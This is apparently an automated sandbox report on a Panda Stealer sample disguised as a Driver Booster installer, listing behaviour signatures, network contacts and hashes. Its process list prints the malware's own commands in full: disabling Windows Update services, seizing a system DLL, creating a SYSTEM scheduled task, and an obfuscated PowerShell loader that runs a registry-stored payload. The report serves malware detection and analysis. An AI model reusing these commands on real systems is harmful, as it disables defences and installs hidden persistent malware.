Analysis Overview
SHA256
23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00
Threat Level: Known bad
The file 23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00 was found to be: Known bad.
Malicious Activity Summary
Panda Stealer payload
PandaStealer
Possible privilege escalation attempt
Stops running service(s)
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Modifies file permissions
Reads user/profile data of web browsers
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Modifies registry class
Modifies registry key
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-04-14 17:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-14 17:33
Reported
2024-04-14 17:47
Platform
win7-20240220-en
Max time kernel
3s
Max time network
17s
Command Line
Signatures
Panda Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
PandaStealer
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lrucache.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Reads user/profile data of web browsers
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lrucache.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe
"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"
C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
"C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"
C:\Users\Admin\AppData\Local\Temp\lrucache.exe
"C:\Users\Admin\AppData\Local\Temp\lrucache.exe"
C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp" /SL5="$40150,28225140,139264,C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"
C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="
C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe" "C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe" /title="Driver Booster 10" /dbver=10.4.0.128 /eula="C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\EULA.rtf" /showlearnmore /pmtproduct /nochromepmt
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "DBassistant"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "DBassistant" /tr "\"C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe\""
C:\Windows\system32\schtasks.exe
schtasks /run /tn "DBassistant"
C:\Windows\system32\taskeng.exe
taskeng.exe {2C733B94-B17B-4042-ADE0-505C7207B682} S-1-5-18:NT AUTHORITY\System:Service:
C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
C:\Users\opera\AppData\Local\Temp\bc3902d8132f43e3ae086a009979fa88\WCCNativeHost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3331cd96-be95-46f9-bd19-6cee6c77ea53}
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{55144820-2c5f-4067-a015-a50dd418f139}
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | f0854165.xsph.ru | udp |
| RU | 141.8.193.236:80 | f0854165.xsph.ru | tcp |
| US | 8.8.8.8:53 | update.iobit.com | udp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
| US | 152.199.20.140:80 | update.iobit.com | tcp |
Files
memory/1992-0-0x0000000000400000-0x00000000022FF000-memory.dmp
\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
| MD5 | ccc48304afa2e7c58492babc297db8a4 |
| SHA1 | decd98730cf34e1567965f6fb7085569fc1053e8 |
| SHA256 | e02061a4626f950b41d89c21e9a780f8aee5c5ddda7880b753d660db09117910 |
| SHA512 | 79bd4dda233b714ecd6746c5f78f9d441852e333202fc74da6430d23d7dc1deadebb5a5608da63ac63ee0891a99ee259d3498d58ac59621226d8bf7862de4b04 |
memory/2880-8-0x0000000000400000-0x000000000042C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lrucache.exe
| MD5 | 6a4308bc229b64cf5bc6d359056b8980 |
| SHA1 | 29f6484fafd50f0c00b5be01d97e82ffeda6f75b |
| SHA256 | 5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7 |
| SHA512 | f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364 |
\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp
| MD5 | 68b52a0b8e3d45bf3b520a0e7f16dad1 |
| SHA1 | e50408326eafb5ca8adc70db29c33b64e25bbbbd |
| SHA256 | b409d6d6f8896dc2afd1774479c741ca253c0e9b4732daaa08af84aa9c96888b |
| SHA512 | b8e0b486e2b9652831eb8efe48cf9575eef49204e827a64d69ae7c9c30304b2d98a66c28f1072fe8596847c15f13bbf7ec39d7708684ff64051bbae7ed063faf |
C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
| MD5 | 0e31bfc197cf7557b6ba5c18ecb1e5b2 |
| SHA1 | 78ec7c8f28568611cf524f30b67875e031a09cb2 |
| SHA256 | 87890cb7476446f228fe1edaf236bd4e02d0f6372805a309bf2773ec64737d78 |
| SHA512 | 700b21c7be3d558970c137cded2e6079b5f2d5ce12495c576a281d210f32c3de3b0369bcfefcf7f666465498c6010c7d33001c098bbe08c2a2f23c10ff67a2e0 |
memory/2484-40-0x000000013F820000-0x000000013FAD4000-memory.dmp
memory/2484-46-0x000000001C250000-0x000000001C4EA000-memory.dmp
memory/2484-48-0x0000000002340000-0x00000000023C0000-memory.dmp
memory/2484-47-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp
memory/2512-49-0x0000000000240000-0x0000000000241000-memory.dmp
memory/1760-55-0x000000001B7B0000-0x000000001BA92000-memory.dmp
memory/1760-57-0x000007FEF1C90000-0x000007FEF262D000-memory.dmp
memory/1760-56-0x0000000002810000-0x0000000002818000-memory.dmp
memory/1760-58-0x00000000028D0000-0x0000000002950000-memory.dmp
memory/1760-59-0x00000000028D0000-0x0000000002950000-memory.dmp
memory/1760-60-0x000007FEF1C90000-0x000007FEF262D000-memory.dmp
memory/1760-61-0x00000000028D0000-0x0000000002950000-memory.dmp
memory/1760-62-0x000007FEF1C90000-0x000007FEF262D000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp\DriverBooster.exe
| MD5 | 5ff2b8b8bf24896093f7e44374fabf95 |
| SHA1 | 69bc407fe124e7e475a90cb9702f768a4b412da3 |
| SHA256 | 77b5f3864c9ded87ccdc2c550d1ac107c918c224ee9aeada6f3fd8834f935d91 |
| SHA512 | 391ea2b19131d73f194afc2ddd594f8648e6acd9c0a7fabffcff1fb27d83ddbd91367bfbf32f7b354d31ae931dea04b73045236eb98848d65fe4de8ee02fb50e |
C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe
| MD5 | 3d403676517f6a99de035a04dc3f3f82 |
| SHA1 | ed69d8f485374dfb58a5b651b1f3f1bab8ee9541 |
| SHA256 | 668f4f4ef277783cc66408d6631b63e9a24ffcd978834835fdb8fb2aa345a56e |
| SHA512 | 4ba6f75e9b518474bf9b846cda386bde0ca65233dd489b357b967e842af71ebca6e325b9fc9b8a0d1d775b16198ff31a6c2d2223797d2a3c490d5da001e8887e |
memory/1596-98-0x0000000000270000-0x0000000000271000-memory.dmp
memory/1596-177-0x0000000002F00000-0x0000000002F40000-memory.dmp
memory/2512-191-0x0000000000400000-0x0000000000531000-memory.dmp
memory/2880-193-0x0000000000400000-0x000000000042C000-memory.dmp
memory/2484-194-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp
C:\ProgramData\IObit\iobitpromotion.ini
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Local\Temp\1713116764\ENGLISH.lng
| MD5 | 8e7f2723f0e72bc6abefca738c9c1ca4 |
| SHA1 | 969a4a6f31e146040a101d526886ede9a7c5c432 |
| SHA256 | f3c690feab9ab2b7dea8ea6334b484768f19caaf85dfa14be2bce5e4fdbffd4b |
| SHA512 | 9a3efa9dd002394050cbd457adb67121fcae7a31b66b42e3d612725b9166bd76c4f8c73ed039226c16248461c7f4f1fb6cac91960b7bb57a3273fbd022b1e232 |
memory/2484-214-0x0000000002340000-0x00000000023C0000-memory.dmp
memory/2676-216-0x0000000140000000-0x0000000140056000-memory.dmp
memory/2676-217-0x0000000140000000-0x0000000140056000-memory.dmp
memory/2676-221-0x0000000140000000-0x0000000140056000-memory.dmp
memory/2676-222-0x0000000140000000-0x0000000140056000-memory.dmp
memory/2676-220-0x0000000140000000-0x0000000140056000-memory.dmp
memory/2676-219-0x0000000140000000-0x0000000140056000-memory.dmp
memory/2676-218-0x0000000140000000-0x0000000140056000-memory.dmp
memory/2484-215-0x0000000000690000-0x0000000000696000-memory.dmp
memory/2676-224-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp
memory/2676-223-0x0000000140000000-0x0000000140056000-memory.dmp
memory/2676-230-0x0000000140000000-0x0000000140056000-memory.dmp
memory/2676-240-0x0000000140000000-0x0000000140056000-memory.dmp
memory/2484-242-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp
memory/2676-228-0x0000000140000000-0x0000000140056000-memory.dmp
memory/2676-226-0x0000000140000000-0x0000000140056000-memory.dmp
memory/1596-247-0x0000000000400000-0x0000000000A17000-memory.dmp
memory/2556-248-0x000000013F450000-0x000000013F704000-memory.dmp
memory/2556-249-0x000007FEF4990000-0x000007FEF537C000-memory.dmp
memory/2208-250-0x0000000019EB0000-0x000000001A192000-memory.dmp
memory/2208-251-0x000007FEF2A60000-0x000007FEF33FD000-memory.dmp
memory/2208-253-0x00000000014D0000-0x0000000001550000-memory.dmp
memory/2208-252-0x00000000008C0000-0x00000000008C8000-memory.dmp
memory/2208-256-0x00000000014D0000-0x0000000001550000-memory.dmp
memory/2208-257-0x00000000014D0000-0x0000000001550000-memory.dmp
memory/1596-258-0x0000000000270000-0x0000000000271000-memory.dmp
memory/2208-261-0x0000000076D40000-0x0000000076E5F000-memory.dmp
memory/2312-262-0x0000000140000000-0x0000000140042000-memory.dmp
memory/2556-264-0x0000000000EB0000-0x0000000000F30000-memory.dmp
memory/1472-266-0x00000000015C0000-0x0000000001600000-memory.dmp
memory/2312-270-0x0000000076D40000-0x0000000076E5F000-memory.dmp
memory/2208-269-0x0000000076E60000-0x0000000077009000-memory.dmp
memory/2312-268-0x0000000076E60000-0x0000000077009000-memory.dmp
memory/2208-267-0x000007FEF2A60000-0x000007FEF33FD000-memory.dmp
memory/2312-265-0x0000000140000000-0x0000000140042000-memory.dmp
memory/2208-260-0x0000000076E60000-0x0000000077009000-memory.dmp
memory/2208-259-0x0000000001680000-0x00000000016C0000-memory.dmp
memory/2208-271-0x0000000076D40000-0x0000000076E5F000-memory.dmp
memory/1472-275-0x00000000015C0000-0x0000000001600000-memory.dmp
memory/1472-277-0x0000000072BB0000-0x000000007315B000-memory.dmp
memory/436-278-0x0000000000B70000-0x0000000000B93000-memory.dmp
memory/1596-279-0x0000000002F00000-0x0000000002F40000-memory.dmp
memory/436-282-0x0000000000B70000-0x0000000000B93000-memory.dmp
memory/2312-283-0x0000000076E60000-0x0000000077009000-memory.dmp
memory/436-285-0x0000000000CC0000-0x0000000000CEA000-memory.dmp
memory/436-287-0x000007FEBE920000-0x000007FEBE930000-memory.dmp
memory/1472-281-0x00000000015C0000-0x0000000001600000-memory.dmp
memory/1472-273-0x0000000072BB0000-0x000000007315B000-memory.dmp
memory/2312-272-0x0000000140000000-0x0000000140042000-memory.dmp
memory/2208-255-0x00000000014D0000-0x0000000001550000-memory.dmp
memory/2208-254-0x000007FEF2A60000-0x000007FEF33FD000-memory.dmp
memory/436-292-0x0000000000CC0000-0x0000000000CEA000-memory.dmp
memory/480-290-0x00000000001E0000-0x000000000020A000-memory.dmp
memory/436-289-0x0000000036EA0000-0x0000000036EB0000-memory.dmp
memory/768-315-0x0000000000230000-0x000000000025A000-memory.dmp
memory/688-313-0x0000000036EA0000-0x0000000036EB0000-memory.dmp
memory/688-311-0x000007FEBE920000-0x000007FEBE930000-memory.dmp
memory/688-309-0x00000000003E0000-0x000000000040A000-memory.dmp
memory/616-306-0x0000000036EA0000-0x0000000036EB0000-memory.dmp
memory/616-304-0x000007FEBE920000-0x000007FEBE930000-memory.dmp
memory/616-302-0x0000000000410000-0x000000000043A000-memory.dmp
memory/436-398-0x0000000076EB1000-0x0000000076EB2000-memory.dmp
memory/1852-415-0x0000000000290000-0x0000000000298000-memory.dmp
memory/1472-413-0x0000000077050000-0x0000000077126000-memory.dmp
memory/1472-412-0x0000000072BB0000-0x000000007315B000-memory.dmp
C:\Windows\Tasks\dialersvc32.job
| MD5 | 5d1e3ddd710c22a98c395c4ddf70d1d6 |
| SHA1 | 617e9fbaf1faf9d8467f918ea38175313ccd8e9e |
| SHA256 | 428ac3eb102e83da4bf95f6349fbfcdaffe44555bc1e714518982fd520356bdb |
| SHA512 | cc2bb444d351a5894af09666dbf01f608399c67a7d4debddaec96dc5ec8b87c7994543be44ec126102381aa43a0a56d8da696a8fbff90e817b5a026683fac2df |
memory/1852-438-0x000000000151B000-0x0000000001582000-memory.dmp
memory/1852-439-0x000007FEEE690000-0x000007FEEF02D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-14 17:33
Reported
2024-04-14 17:46
Platform
win10v2004-20240412-en
Max time kernel
16s
Max time network
11s
Command Line
Signatures
Panda Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
PandaStealer
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\lrucache.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3608 set thread context of 3940 | N/A | C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe | C:\Windows\System32\conhost.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
